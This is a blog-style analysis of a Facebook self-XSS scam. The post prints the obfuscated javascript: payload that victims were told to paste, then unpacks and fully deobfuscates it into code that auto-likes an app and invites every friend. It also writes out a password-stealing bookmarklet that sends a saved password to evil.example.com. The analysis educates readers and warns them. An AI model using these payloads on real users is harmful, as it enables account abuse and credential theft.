Facebook social engineering XSS

Found in the wild (http://www.facebook.com/pages/Teacher-asked-Why-do-Boys-Walk-faster-then-Girls-Girls-Talk-more-then-Boys/125748790772279), this page attempts to trick users by instructing them to press Ctrl+C to copy hidden JavaScript, then Alt+D to focus the address bar, where they paste and run it:

javascript:(function(){a=’app121760014508794_iji’;b=’app121760014508794_aja’;rew=’app121760014508794_rew’;qwe=’app121760014508794_qwe’;qtt=’app121760014508794_qtt’;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘P e=[“\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D”,”\\l\\h\\D\\k\\f”,”\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x”,”\\y\\g\\x\\x\\f\\j”,”\\g\\j\\j\\f\\z\\R\\K\\L\\S”,”\\p\\n\\k\\A\\f”,”\\l\\A\\o\\o\\f\\l\\h”,”\\k\\g\\G\\f\\q\\f”,”\\l\\k\\g\\j\\G”,”\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l”,”\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h”,”\\t\\k\\g\\t\\G”,”\\g\\j\\g\\h\\v\\p\\f\\j\\h”,”\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h”,”\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k”,”\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q”,”\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u”,”\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o”,”\\g\\j\\u\\A\\h”,”\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f”,”\\Z\\y\\n\\z\\f”,”\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h”];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);’,62,85,’||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||qtt|fs|SocialGraphManager|for|in|if|20|qwe|rew|21|2000|4000|3000′.split(‘|’),0,{}))})();

______________________________________

This looks like output of the "Dean Edwards packing tool"; run through http://www.strictly-software.com/unpacker, it unpacks to the following:
______________________________________

// Unpacked (but still obfuscated) payload. Every string constant lives in the
// hex-escaped `variables` table and the script refers to them only by index,
// so the control flow is readable here while the DOM targets and the endpoint
// are not; the decoded table and the substituted listing follow below.
// Free identifiers: `a`, `b`, `qtt`, `qwe`, `rew` are the element-id strings
// assigned by the bookmarklet wrapper above; `fs` and `SocialGraphManager` are
// defined nowhere in the payload (presumably page-level globals on the host
// site — not verifiable from this listing alone).
var variables = [“\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79”, “\x73\x74\x79\x6C\x65”, “\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64”, “\x68\x69\x64\x64\x65\x6E”, “\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C”, “\x76\x61\x6C\x75\x65”, “\x73\x75\x67\x67\x65\x73\x74”, “\x6C\x69\x6B\x65\x6D\x65”, “\x73\x6C\x69\x6E\x6B”, “\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73”, “\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74”, “\x63\x6C\x69\x63\x6B”, “\x69\x6E\x69\x74\x45\x76\x65\x6E\x74”, “\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74”, “\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C”, “\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D”, “\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70”, “\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67”, “\x69\x6E\x70\x75\x74”, “\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65”, “\x53\x68\x61\x72\x65”, “\x70\x6F\x70\x5F\x63\x6F\x6E\x74\x65\x6E\x74”];
// `d` is just a short alias for `document`; note that d, s, m, sl, c, inp and
// i are all assigned without `var`, i.e. as implicit globals.
d = document;
// Two initial DOM writes (once decoded: style.visibility = "hidden" on `qtt`,
// and the `value` of `b` copied into the `innerHTML` of `a`).
d[variables[2]](qtt)[variables[1]][variables[0]] = variables[3];
d[variables[2]](a)[variables[4]] = d[variables[2]](b)[variables[5]];
// Look up three elements by id and build one synthetic event (variables[9]
// is the event module name, variables[11] the event type) that is re-used for
// every dispatch below; the two `true` arguments are bubbles/cancelable.
s = d[variables[2]](variables[6]);
m = d[variables[2]](variables[7]);
sl = d[variables[2]](variables[8]);
c = d[variables[10]](variables[9]);
c[variables[12]](variables[11], true, true);
s[variables[13]](c);
// Timed sequence: the two 5000 ms timers below are armed at the same time, and
// the second one chains nested 3000 / 4000 / 2000 ms timers (roughly 14 s end
// to end), spacing the steps out so each UI action has time to complete.
setTimeout(function () {
fs[variables[14]]()
},
5000);
setTimeout(function () {
// Submits a form (variables[15]) to an endpoint path (variables[16]) via a
// host-page object that the payload itself never defines.
SocialGraphManager[variables[17]](variables[15], variables[16]);
setTimeout(function () {
c[variables[12]](variables[11], true, true);
sl[variables[13]](c);
setTimeout(function () {
// Walks every element of a tag-name collection (variables[18]) and dispatches
// the synthetic event on those whose `value` equals variables[20]. `for...in`
// also visits the collection's non-index properties; they have no `value`,
// so the comparison is simply false for them.
inp = document[variables[19]](variables[18]);
for (i in inp) {
if (inp[i][variables[5]] == variables[20]) {
inp[i][variables[13]](c)
}
};
m[variables[13]](c);
setTimeout(function () {
// Final DOM write: `value` of `rew` copied into the `innerHTML` of `qwe`.
d[variables[2]](qwe)[variables[4]] = d[variables[2]](rew)[variables[5]];
},
2000)
},
4000)
},
3000)
},
5000);

______________________________________

After running a few JavaScript lines in Firebug to decode the hex-escaped strings in the variables array:

outputstring=”[“;
for(var i=0;i<variables.length;i++)
outputstring+=”\””+variables[i]+”\”, “;alert(outputstring);

we get:

// Decoded string table produced by the Firebug snippet above: index N here is
// the plain-text value that `variables[N]` resolves to in the unpacked
// listing (DOM property names, element ids, an event type and a form/endpoint
// pair).
var variables = [“visibility”, “style”, “getElementById”, “hidden”, “innerHTML”, “value”, “suggest”, “likeme”, “slink”, “MouseEvents”, “createEvent”, “click”, “initEvent”, “dispatchEvent”, “select_all”, “sgm_invite_form”, “/ajax/social_graph/invite_dialog.php”, “submitDialog”, “input”, “getElementsByTagName”, “Share”, “pop_content”];

and substitute the variables in the source:

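// Inline the decoded strings into the unpacked source: every literal
// "variables[N]" in `src` becomes the quoted string at index N of `variables`.
// The escaped "\\]" anchors the closing bracket, so replacing variables[1]
// cannot also match variables[10]..variables[19]. A replacer function is used
// instead of a replacement string so that any "$" in a decoded value is
// inserted literally rather than being read as a replacement pattern.
// Assumes `src` holds the unpacked listing and `variables` the decoded array.
for (var i = 0; i < variables.length; i++) {
  src = src.replace(new RegExp('variables\\[' + i + '\\]', 'g'), function () {
    return '"' + variables[i] + '"';
  });
}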

we get a well-deobfuscated source:
______________________________________

// Fully deobfuscated payload. `a`, `b`, `qtt`, `qwe`, `rew` are the element-id
// strings assigned by the bookmarklet wrapper at the top of the page; `fs`
// and `SocialGraphManager` are never defined by the payload (presumably
// globals of the host page — not verifiable from this listing). All the
// working variables (d, s, m, sl, c, inp, i) are implicit globals.
d = document;
// Hide the element with id `qtt`, then copy the `value` of element `b` into
// the `innerHTML` of element `a` — i.e. text taken from a form field is
// written into the page as markup.
d[“getElementById”](qtt)[“style”][“visibility”] = “hidden”;
d[“getElementById”](a)[“innerHTML”] = d[“getElementById”](b)[“value”];
// Grab the controls that will be "clicked" (the ids suggest Facebook's
// suggest / like / share-link widgets — inferred from the names, not shown
// here), and build one synthetic MouseEvents object: initEvent("click",
// bubbles=true, cancelable=true). The same event object is re-used for every
// dispatch that follows.
s = d[“getElementById”](“suggest”);
m = d[“getElementById”](“likeme”);
sl = d[“getElementById”](“slink”);
c = d[“createEvent”](“MouseEvents”);
c[“initEvent”](“click”, true, true);
// Step 1 (t = 0): synthetic click on the "suggest" element.
s[“dispatchEvent”](c);
// Step 2 (t ≈ 5 s): call select_all() on the undefined-here `fs` object; the
// 5 s gap presumably lets the dialog opened by step 1 render first.
setTimeout(function () {
fs[“select_all”]()
},
5000);
// Step 3 (t ≈ 5 s, armed in parallel with step 2): submit the
// "sgm_invite_form" to the invite-dialog endpoint through a host-page helper,
// then chain the remaining steps with nested timers.
setTimeout(function () {
SocialGraphManager[“submitDialog”](“sgm_invite_form”, “/ajax/social_graph/invite_dialog.php”);
// Step 4 (t ≈ 8 s): re-initialise the event and click the "slink" element.
setTimeout(function () {
c[“initEvent”](“click”, true, true);
sl[“dispatchEvent”](c);
// Step 5 (t ≈ 12 s): click every <input> whose value is exactly "Share", then
// click the "likeme" element. `for...in` over the HTMLCollection also visits
// its non-index properties (e.g. `length`); those have no `value`, so the
// equality test is simply false for them. The stray `;` after the loop is an
// empty statement.
setTimeout(function () {
inp = document[“getElementsByTagName”](“input”);
for (i in inp) {
if (inp[i][“value”] == “Share”) {
inp[i][“dispatchEvent”](c)
}
};
m[“dispatchEvent”](c);
// Step 6 (t ≈ 14 s): copy the `value` of element `rew` into the `innerHTML`
// of element `qwe` — a second value-to-markup write, mirroring the first.
setTimeout(function () {
d[“getElementById”](qwe)[“innerHTML”] = d[“getElementById”](rew)[“value”];
},
2000)
},
4000)
},
3000)
},5000);

Read this way, the script uses simulated mouse clicks to like the app and to suggest it to all of your friends. It could be worse: the same delivery trick could steal your password if the browser has it saved on the login page, for example:

javascript:(function(){var ifr = document.createElement(“iframe”);ifr.src=”/login.php”;ifr.height=0;ifr.width=0;document.body.appendChild(ifr);setTimeout(function(){var mypass=ifr.contentWindow.document.getElementById(“pass”).value;new Image().src=”http://evil.example.com/evil.php?pass=”+mypass;alert(“Your password is “+mypass+” and I just sent it to evil.example.com”);},1000);})();

or serve you exploits, or unfriend all your friends… Perhaps people will treat this as a learning opportunity, so that if something genuinely harmful does come along, they won’t get hit.
